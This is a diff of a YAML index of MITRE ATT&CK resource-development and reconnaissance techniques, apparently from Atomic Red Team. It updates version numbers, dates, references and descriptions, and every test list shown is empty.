+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54718,7 +55382,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54732,7 +55396,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54765,11 +55429,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54791,7 +55462,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54809,47 +55480,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54858,21 +55492,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54912,7 +55582,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54931,15 +55601,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54947,19 +55615,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54993,55 +55661,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -55066,7 +55743,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -55082,8 +55759,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -55105,7 +55780,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -55121,8 +55796,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -55150,7 +55823,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -55166,33 +55839,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -55206,18 +55879,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -55238,7 +55922,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -55254,39 +55938,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -55294,13 +55976,41 @@ reconnaissance:
